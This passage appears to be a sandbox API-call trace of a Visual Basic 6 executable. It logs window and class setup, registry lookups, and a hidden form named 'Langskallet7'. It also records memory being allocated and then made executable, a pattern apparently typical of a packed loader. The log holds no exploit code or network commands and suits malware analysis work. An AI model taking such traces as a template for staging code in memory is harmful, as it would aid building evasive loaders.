Msg=0x83, wParam=0x0, lParam=0x18fa48) returned 0x0 [0294.917] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x1, wParam=0x0, lParam=0x18fa5c) returned 0x0 [0294.917] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0294.917] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0294.917] MonitorFromWindow (hwnd=0x1010a, dwFlags=0x2) returned 0x10001 [0294.917] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x18fe80 | out: lpmi=0x18fe80) returned 1 [0294.917] SetWindowPos (hWnd=0x1010a, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0294.917] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x46, wParam=0x0, lParam=0x18fe20) returned 0x0 [0294.918] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x47, wParam=0x0, lParam=0x18fe20) returned 0x0 [0294.918] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0294.918] ShowWindow (hWnd=0x1010a, nCmdShow=4) returned 0 [0294.918] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0294.919] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x46, wParam=0x0, lParam=0x18fe34) returned 0x0 [0294.919] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x47, wParam=0x0, lParam=0x18fe34) returned 0x0 [0294.919] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x6a8 [0294.919] VirtualQuery (in: lpAddress=0x18fea8, lpBuffer=0x18fe8c, dwLength=0x1c | out: lpBuffer=0x18fe8c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0294.919] GetUserDefaultLCID () returned 0x409 [0294.919] IsValidCodePage (CodePage=0x3a4) returned 1 [0294.920] IsValidCodePage (CodePage=0x3b5) returned 1 [0294.920] IsValidCodePage (CodePage=0x3b6) returned 1 [0294.921] IsValidCodePage (CodePage=0x3a8) returned 1 [0294.923] GetUserDefaultLangID () returned 0x409 [0294.923] GetSystemDefaultLangID () returned 0x310409 [0294.923] GetSystemMetrics (nIndex=42) returned 0 [0294.923] IMalloc:Alloc (This=0x75c266bc, cb=0xa8) returned 0x31d6a8 [0294.923] IMalloc:GetSize (This=0x75c266bc, pv=0x31d6a8) returned 0xa8 [0294.923] IMalloc:Alloc (This=0x75c266bc, cb=0xc) returned 0x31cf00 [0294.923] GetCurrentThreadId () returned 0x6a8 [0294.923] IMalloc:Alloc (This=0x75c266bc, cb=0x3c) returned 0x319f40 [0294.923] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x319740 [0294.924] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fe74 | out: phkResult=0x18fe74*=0x0) returned 0x2 [0294.924] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x319768 [0294.924] GetCurrentThreadId () returned 0x6a8 [0294.924] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0x6a8) returned 0x100e9 [0294.924] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x18fdcc | out: lpWndClass=0x18fdcc) returned 0 [0294.924] RegisterClassA (lpWndClass=0x18fdcc) returned 0x98c0e3 [0294.924] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x1010e [0294.924] NtdllDefWindowProc_A (hWnd=0x1010e, Msg=0x81, wParam=0x0, lParam=0x18fa08) returned 0x1 [0294.924] NtdllDefWindowProc_A (hWnd=0x1010e, Msg=0x83, wParam=0x0, lParam=0x18f9f4) returned 0x0 [0294.924] NtdllDefWindowProc_A (hWnd=0x1010e, Msg=0x1, wParam=0x0, lParam=0x18fa08) returned 0x0 [0294.924] NtdllDefWindowProc_A (hWnd=0x1010e, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0294.924] NtdllDefWindowProc_A (hWnd=0x1010e, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0294.925] SetWindowLongA (hWnd=0x1010e, nIndex=0, dwNewLong=4923548) returned 0 [0294.925] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0294.925] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0294.925] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0294.925] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0294.925] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0294.925] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0294.925] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0294.925] CreateCompatibleDC (hdc=0x0) returned 0x150107c0 [0294.925] GetCurrentObject (hdc=0x150107c0, type=0x7) returned 0x185000f [0294.925] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x1010a, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x10110 [0294.925] NtdllDefWindowProc_A (hWnd=0x10110, Msg=0x81, wParam=0x0, lParam=0x18fa98) returned 0x1 [0294.925] NtdllDefWindowProc_A (hWnd=0x10110, Msg=0x83, wParam=0x0, lParam=0x18fa84) returned 0x0 [0294.925] NtdllDefWindowProc_A (hWnd=0x10110, Msg=0x1, wParam=0x0, lParam=0x18fa98) returned 0x0 [0294.925] NtdllDefWindowProc_A (hWnd=0x10110, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0294.925] NtdllDefWindowProc_A (hWnd=0x10110, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0294.925] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x210, wParam=0x1, lParam=0x10110) returned 0x0 [0294.925] GetCurrentThreadId () returned 0x6a8 [0294.925] GetCurrentThreadId () returned 0x6a8 [0294.926] lstrlenA (lpString="VB") returned 2 [0294.926] lstrlenA (lpString="CommandButton") returned 13 [0294.926] lstrlenA (lpString="VB") returned 2 [0294.926] lstrlenA (lpString="Printer") returned 7 [0294.927] lstrlenA (lpString="VB") returned 2 [0294.927] lstrlenA (lpString="Form") returned 4 [0294.927] lstrlenA (lpString="VB") returned 2 [0294.927] lstrlenA (lpString="Screen") returned 6 [0294.927] lstrlenA (lpString="VB") returned 2 [0294.927] lstrlenA (lpString="Clipboard") returned 9 [0294.927] lstrlenA (lpString="VB") returned 2 [0294.927] lstrlenA (lpString="MDIForm") returned 7 [0294.928] lstrlenA (lpString="VB") returned 2 [0294.928] lstrlenA (lpString="App") returned 3 [0294.928] lstrlenA (lpString="VB") returned 2 [0294.928] lstrlenA (lpString="UserControl") returned 11 [0294.928] lstrlenA (lpString="VB") returned 2 [0294.928] lstrlenA (lpString="PropertyPage") returned 12 [0294.928] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0294.928] lstrlenA (lpString="VB") returned 2 [0294.928] lstrlenA (lpString="UserDocument") returned 12 [0294.929] GetCurrentThreadId () returned 0x6a8 [0294.929] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] GetCurrentThreadId () returned 0x6a8 [0294.930] lstrlenA (lpString="VB") returned 2 [0294.930] lstrlenA (lpString="PictureBox") returned 10 [0294.931] lstrlenA (lpString="VB") returned 2 [0294.931] lstrlenA (lpString="Label") returned 5 [0294.932] lstrlenA (lpString="VB") returned 2 [0294.932] lstrlenA (lpString="TextBox") returned 7 [0294.932] lstrlenA (lpString="VB") returned 2 [0294.932] lstrlenA (lpString="Frame") returned 5 [0294.932] lstrlenA (lpString="VB") returned 2 [0294.932] lstrlenA (lpString="CheckBox") returned 8 [0294.932] lstrlenA (lpString="VB") returned 2 [0294.932] lstrlenA (lpString="OptionButton") returned 12 [0294.933] lstrlenA (lpString="VB") returned 2 [0294.933] lstrlenA (lpString="ComboBox") returned 8 [0294.933] lstrlenA (lpString="VB") returned 2 [0294.933] lstrlenA (lpString="ListBox") returned 7 [0294.933] lstrlenA (lpString="VB") returned 2 [0294.933] lstrlenA (lpString="HScrollBar") returned 10 [0294.934] lstrlenA (lpString="VB") returned 2 [0294.934] lstrlenA (lpString="VScrollBar") returned 10 [0294.934] lstrlenA (lpString="VB") returned 2 [0294.934] lstrlenA (lpString="Timer") returned 5 [0294.934] lstrlenA (lpString="VB") returned 2 [0294.934] lstrlenA (lpString="DriveListBox") returned 12 [0294.934] lstrlenA (lpString="VB") returned 2 [0294.934] lstrlenA (lpString="DirListBox") returned 10 [0294.934] lstrlenA (lpString="VB") returned 2 [0294.934] lstrlenA (lpString="FileListBox") returned 11 [0294.935] lstrlenA (lpString="VB") returned 2 [0294.935] lstrlenA (lpString="Menu") returned 4 [0294.935] lstrlenA (lpString="VB") returned 2 [0294.935] lstrlenA (lpString="Shape") returned 5 [0294.935] lstrlenA (lpString="VB") returned 2 [0294.935] lstrlenA (lpString="Line") returned 4 [0294.935] lstrlenA (lpString="VB") returned 2 [0294.935] lstrlenA (lpString="Image") returned 5 [0294.936] lstrlenA (lpString="VB") returned 2 [0294.936] lstrlenA (lpString="Data") returned 4 [0294.936] lstrlenA (lpString="VB") returned 2 [0294.936] lstrlenA (lpString="OLE") returned 3 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x31d758 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x31d7c8 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x31d838 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x31d8a8 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x64) returned 0x31d918 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0xc) returned 0x31cf18 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x7c) returned 0x31d988 [0295.248] IMalloc:GetSize (This=0x75c266bc, pv=0x31d988) returned 0x7c [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x20) returned 0x319970 [0295.248] GetCurrentThreadId () returned 0x6a8 [0295.248] GetCurrentThreadId () returned 0x6a8 [0295.248] IMalloc:Alloc (This=0x75c266bc, cb=0x1c) returned 0x319998 [0295.249] VirtualProtect (in: lpAddress=0x290000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x20) returned 1 [0295.249] GetCurrentProcess () returned 0xffffffff [0295.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x290000, dwSize=0x6000) returned 1 [0295.249] VirtualAlloc (lpAddress=0x290000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0295.249] VirtualAlloc (lpAddress=0x290000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0295.249] VirtualAlloc (lpAddress=0x290000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0295.249] VirtualAlloc (lpAddress=0x290000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0295.250] VirtualProtect (in: lpAddress=0x290000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x18fdf8 | out: lpflOldProtect=0x18fdf8*=0x4) returned 1 [0295.250] GetCurrentProcess () returned 0xffffffff [0295.250] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x290000, dwSize=0xa000) returned 1 [0295.250] GetCurrentThreadId () returned 0x6a8 [0295.255] GetCurrentThreadId () returned 0x6a8 [0295.255] SetWindowTextA (hWnd=0x1010a, lpString="Ngtede") returned 1 [0295.255] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0xc, wParam=0x0, lParam=0x18fd6c) returned 0x1 [0295.255] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x18fd54 | out: phkResult=0x18fd54*=0x0) returned 0x2 [0296.260] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0296.260] VirtualQuery (in: lpAddress=0x18f780, lpBuffer=0x18f764, dwLength=0x1c | out: lpBuffer=0x18f764*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0296.603] IMalloc:Alloc (This=0x75c266bc, cb=0x68) returned 0x31ea10 [0296.603] IMalloc:GetSize (This=0x75c266bc, pv=0x31ea10) returned 0x68 [0296.780] GetCurrentThreadId () returned 0x6a8 [0296.780] GetCurrentThreadId () returned 0x6a8 [0296.780] GetCurrentThreadId () returned 0x6a8 [0297.144] GetCurrentThreadId () returned 0x6a8 [0297.144] GetCurrentThreadId () returned 0x6a8 [0297.144] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xb4 [0297.376] GetVersionExA (in: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x14b5d0c, dwMinorVersion=0x18f9cc, dwBuildNumber=0x18fd00, dwPlatformId=0x18ff70, szCSDVersion="Í\x1eÒwIÃ\x16") | out: lpVersionInformation=0x18fa7c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0297.376] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0297.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72992cd8, cbMultiByte=-1, lpWideCharStr=0x18faa4, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0297.477] OleCreateFontIndirect () returned 0x0 [0297.600] lstrlenA (lpString="Langskallet7") returned 12 [0297.846] LoadIconA (hInstance=0x72940000, lpIconName=0x4b1) returned 0x800af [0297.958] OleCreatePictureIndirect () returned 0x0 [0297.958] lstrlenA (lpString="Langskallet7") returned 12 [0297.958] lstrlenA (lpString="ThunderRT6") returned 10 [0297.958] lstrcpyA (in: lpString1=0x18fab8, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0297.958] lstrlenA (lpString="ThunderRT6Form") returned 14 [0297.958] lstrcpynA (in: lpString1=0x18fac6, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0297.958] lstrlenA (lpString="ThunderRT6") returned 10 [0297.958] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0297.959] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x18fa78 | out: lpWndClass=0x18fa78) returned 0 [0297.959] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0297.959] RegisterClassA (lpWndClass=0x18fa78) returned 0xe3c109 [0297.959] lstrlenA (lpString="ThunderRT6") returned 10 [0297.959] lstrcpyA (in: lpString1=0x18fa4c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0297.959] lstrlenA (lpString="ThunderRT6Form") returned 14 [0297.959] lstrcpynA (in: lpString1=0x18fa5a, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0297.959] RegisterClassA (lpWndClass=0x18fa78) returned 0xc106 [0297.959] AdjustWindowRectEx (in: lpRect=0x18fb78, dwStyle=0x2cb0000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x18fb78) returned 1 [0297.959] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc106, lpWindowName="Langskallet7", dwStyle=0x2cb0000, X=302, Y=284, nWidth=342, nHeight=229, hWndParent=0x1010a, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x10120 [0297.959] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x81, wParam=0x0, lParam=0x18f69c) returned 0x1 [0297.959] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x83, wParam=0x0, lParam=0x18f688) returned 0x0 [0297.961] GetSystemMenu (hWnd=0x10120, bRevert=0) returned 0x100f7 [0298.208] SetWindowContextHelpId (param_1=0x10120, param_2=0xffffffff) returned 1 [0298.208] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x1, wParam=0x0, lParam=0x18f69c) returned 0x0 [0298.208] GetDC (hWnd=0x10120) returned 0x300107a0 [0298.208] GetTextMetricsA (in: hdc=0x300107a0, lptm=0x18fa64 | out: lptm=0x18fa64) returned 1 [0298.208] SetBkMode (hdc=0x300107a0, mode=1) returned 2 [0298.394] OleTranslateColor () returned 0x0 [0298.394] SetBkColor (hdc=0x300107a0, color=0xf0f0f0) returned 0xffffff [0298.394] OleTranslateColor () returned 0x0 [0298.394] SetTextColor (hdc=0x300107a0, color=0x0) returned 0x0 [0298.394] OleTranslateColor () returned 0x0 [0298.394] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x103007cf [0298.394] SelectObject (hdc=0x300107a0, h=0x103007cf) returned 0x1b00017 [0298.394] SelectObject (hdc=0x300107a0, h=0x1900011) returned 0x1900010 [0298.394] ClientToScreen (in: hWnd=0x10120, lpPoint=0x18fa44 | out: lpPoint=0x18fa44) returned 1 [0298.394] SetBrushOrgEx (in: hdc=0x300107a0, x=1, y=5, lppt=0x0 | out: lppt=0x0) returned 1 [0298.394] UnrealizeObject (h=0x1900015) returned 1 [0298.394] SelectObject (hdc=0x300107a0, h=0x1900015) returned 0x1900011 [0298.395] SelectObject (hdc=0x300107a0, h=0x1e0a07b2) returned 0x18a002e [0298.395] GetTextMetricsA (in: hdc=0x300107a0, lptm=0x18f858 | out: lptm=0x18f858) returned 1 [0298.800] GetClientRect (in: hWnd=0x10120, lpRect=0x18fbf8 | out: lpRect=0x18fbf8) returned 1 [0298.800] MapWindowPoints (in: hWndFrom=0x10120, hWndTo=0x0, lpPoints=0x18fbf8, cPoints=0x2 | out: lpPoints=0x18fbf8) returned 20250929 [0298.800] EqualRect (lprc1=0x18fbf8, lprc2=0x18fbd8) returned 1 [0298.800] SetEvent (hEvent=0xb4) returned 1 [0298.800] IsIconic (hWnd=0x10120) returned 0 [0298.800] SendMessageA (hWnd=0x10120, Msg=0x80, wParam=0x1, lParam=0x800af) returned 0x0 [0298.800] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x80, wParam=0x1, lParam=0x800af) returned 0x0 [0300.282] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x2009d [0300.360] IsIconic (hWnd=0x10120) returned 0 [0300.360] IsZoomed (hWnd=0x10120) returned 0 [0300.360] GetClientRect (in: hWnd=0x10120, lpRect=0x18fbec | out: lpRect=0x18fbec) returned 1 [0300.360] GetWindow (hWnd=0x10120, uCmd=0x5) returned 0x0 [0300.516] GetCurrentThreadId () returned 0x6a8 [0300.516] ShowWindow (hWnd=0x10120, nCmdShow=1) returned 0 [0300.516] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0300.516] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0300.516] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0300.517] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0300.517] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x46, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0300.517] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x1c, wParam=0x1, lParam=0x5d0) returned 0x0 [0300.517] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x1c, wParam=0x1, lParam=0x5d0) returned 0x0 [0300.517] GetWindowLongA (hWnd=0x1010e, nIndex=0) returned 4923548 [0300.517] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x86, wParam=0x1, lParam=0x0) returned 0x1 [0300.518] IsIconic (hWnd=0x10120) returned 0 [0300.518] GetFocus () returned 0x0 [0300.518] GetFocus () returned 0x0 [0300.518] IsWindowEnabled (hWnd=0x10120) returned 1 [0300.518] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x6a8 [0300.518] GetCurrentThreadId () returned 0x6a8 [0300.518] SetFocus (hWnd=0x10120) returned 0x0 [0300.522] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x281, wParam=0x1, lParam=0xc000000f) returned 0x0 [0300.523] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x282, wParam=0x2, lParam=0x0) returned 0x0 [0300.524] IsIconic (hWnd=0x10120) returned 0 [0300.524] GetFocus () returned 0x10120 [0300.524] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0300.524] IsWindowEnabled (hWnd=0x10120) returned 1 [0300.524] PostMessageA (hWnd=0x10120, Msg=0x100e, wParam=0xa, lParam=0x0) returned 1 [0300.524] IsIconic (hWnd=0x10120) returned 0 [0300.524] PostMessageA (hWnd=0x10120, Msg=0x100e, wParam=0xe, lParam=0x0) returned 1 [0300.524] PostMessageA (hWnd=0x10120, Msg=0x105a, wParam=0x0, lParam=0x0) returned 1 [0300.524] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0300.524] IsIconic (hWnd=0x10120) returned 0 [0300.524] IsIconic (hWnd=0x10120) returned 0 [0300.525] GetParent (hWnd=0x10120) returned 0x0 [0300.525] GetWindowRect (in: hWnd=0x10120, lpRect=0x18f764 | out: lpRect=0x18f764) returned 1 [0300.525] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0300.525] GetWindowLongA (hWnd=0x10120, nIndex=-16) returned 382402560 [0300.525] GetClientRect (in: hWnd=0x10120, lpRect=0x18f7d4 | out: lpRect=0x18f7d4) returned 1 [0300.525] MapWindowPoints (in: hWndFrom=0x10120, hWndTo=0x0, lpPoints=0x18f7d4, cPoints=0x2 | out: lpPoints=0x18f7d4) returned 20250929 [0300.525] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x83, wParam=0x1, lParam=0x18f720) returned 0x0 [0300.526] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x85, wParam=0x1, lParam=0x0) returned 0x0 [0300.526] IsIconic (hWnd=0x10120) returned 0 [0300.526] IsIconic (hWnd=0x10120) returned 0 [0300.527] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x47, wParam=0x0, lParam=0x18fb3c) returned 0x0 [0300.527] IsWindowVisible (hWnd=0x10120) returned 1 [0300.527] IsIconic (hWnd=0x10120) returned 0 [0300.527] IsZoomed (hWnd=0x10120) returned 0 [0300.527] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x5, wParam=0x0, lParam=0xc90150) returned 0x0 [0300.527] GetClientRect (in: hWnd=0x10120, lpRect=0x18f7ac | out: lpRect=0x18f7ac) returned 1 [0300.527] GetWindow (hWnd=0x10120, uCmd=0x5) returned 0x0 [0300.527] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x3, wParam=0x0, lParam=0x1350131) returned 0x0 [0300.527] GetCurrentThreadId () returned 0x6a8 [0300.527] PostThreadMessageA (idThread=0x6a8, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0300.527] GetCurrentProcessId () returned 0x6a4 [0300.527] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0300.527] NtdllDefWindowProc_A (hWnd=0x1010e, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0300.527] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x219, wParam=0x7, lParam=0x0) returned 0x1 [0300.527] IsWindow (hWnd=0x10120) returned 1 [0300.527] GetWindowLongA (hWnd=0x10120, nIndex=-16) returned 382402560 [0300.528] IsIconic (hWnd=0x10120) returned 0 [0300.528] GetParent (hWnd=0x10120) returned 0x0 [0300.528] TranslateMessage (lpMsg=0x18fe58) returned 0 [0300.528] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0300.528] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0300.528] IsWindow (hWnd=0x10120) returned 1 [0300.528] GetWindowLongA (hWnd=0x10120, nIndex=-16) returned 382402560 [0300.528] IsIconic (hWnd=0x10120) returned 0 [0300.528] GetParent (hWnd=0x10120) returned 0x0 [0300.528] TranslateMessage (lpMsg=0x18fe58) returned 0 [0300.528] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0300.528] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0300.528] IsWindow (hWnd=0x10120) returned 1 [0300.528] GetWindowLongA (hWnd=0x10120, nIndex=-16) returned 382402560 [0300.528] IsIconic (hWnd=0x10120) returned 0 [0300.528] GetParent (hWnd=0x10120) returned 0x0 [0300.528] TranslateMessage (lpMsg=0x18fe58) returned 0 [0300.528] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0300.528] GetActiveWindow () returned 0x10120 [0300.528] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x6a8 [0300.528] GetFocus () returned 0x10120 [0300.528] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0300.528] TranslateMessage (lpMsg=0x18fe58) returned 0 [0300.528] DispatchMessageA (lpMsg=0x18fe58) returned 0x0 [0300.528] PeekMessageA (in: lpMsg=0x18fe58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fe58) returned 1 [0300.528] IsWindow (hWnd=0x10120) returned 1 [0300.528] GetWindowLongA (hWnd=0x10120, nIndex=-16) returned 382402560 [0300.528] IsIconic (hWnd=0x10120) returned 0 [0300.528] GetParent (hWnd=0x10120) returned 0x0 [0300.528] TranslateMessage (lpMsg=0x18fe58) returned 0 [0300.529] DispatchMessageA (lpMsg=0x18fe58) [0300.529] IsIconic (hWnd=0x10120) returned 0 [0300.529] IsIconic (hWnd=0x10120) returned 0 [0300.529] BeginPaint (in: hWnd=0x10120, lpPaint=0x18fa00 | out: lpPaint=0x18fa00) returned 0x300107a0 [0300.529] GetClientRect (in: hWnd=0x10120, lpRect=0x18fa40 | out: lpRect=0x18fa40) returned 1 [0300.529] OleTranslateColor () returned 0x0 [0300.529] OleTranslateColor () returned 0x0 [0300.529] CreateSolidBrush (color=0xf0f0f0) returned 0x1010021e [0300.529] OleTranslateColor () returned 0x0 [0300.529] OleTranslateColor () returned 0x0 [0300.529] SetTextColor (hdc=0x300107a0, color=0x0) returned 0x0 [0300.529] SetBkColor (hdc=0x300107a0, color=0xf0f0f0) returned 0xf0f0f0 [0300.529] FillRect (hDC=0x300107a0, lprc=0x18fa40, hbr=0x1010021e) returned 1 [0300.529] SetTextColor (hdc=0x300107a0, color=0x0) returned 0x0 [0300.529] SetBkColor (hdc=0x300107a0, color=0xf0f0f0) returned 0xf0f0f0 [0300.529] EndPaint (hWnd=0x10120, lpPaint=0x18fa00) returned 1 [0300.530] IsWindowVisible (hWnd=0x10120) returned 1 [0300.530] IsIconic (hWnd=0x10120) returned 0 [0300.530] IsZoomed (hWnd=0x10120) returned 0 [0300.530] ShowWindow (hWnd=0x10120, nCmdShow=0) returned 1 [0300.530] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0 [0300.530] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0300.531] NtdllDefWindowProc_A (hWnd=0x1010a, Msg=0x46, wParam=0x0, lParam=0x18f374) returned 0x0 [0300.532] GetParent (hWnd=0x10120) returned 0x0 [0300.532] GetWindowRect (in: hWnd=0x10120, lpRect=0x18ef9c | out: lpRect=0x18ef9c) returned 1 [0300.532] NtdllDefWindowProc_A (hWnd=0x10120, Msg=0x47, wParam=0x0, lParam=0x18f374) returned 0x0 [0300.532] GetWindowLongA 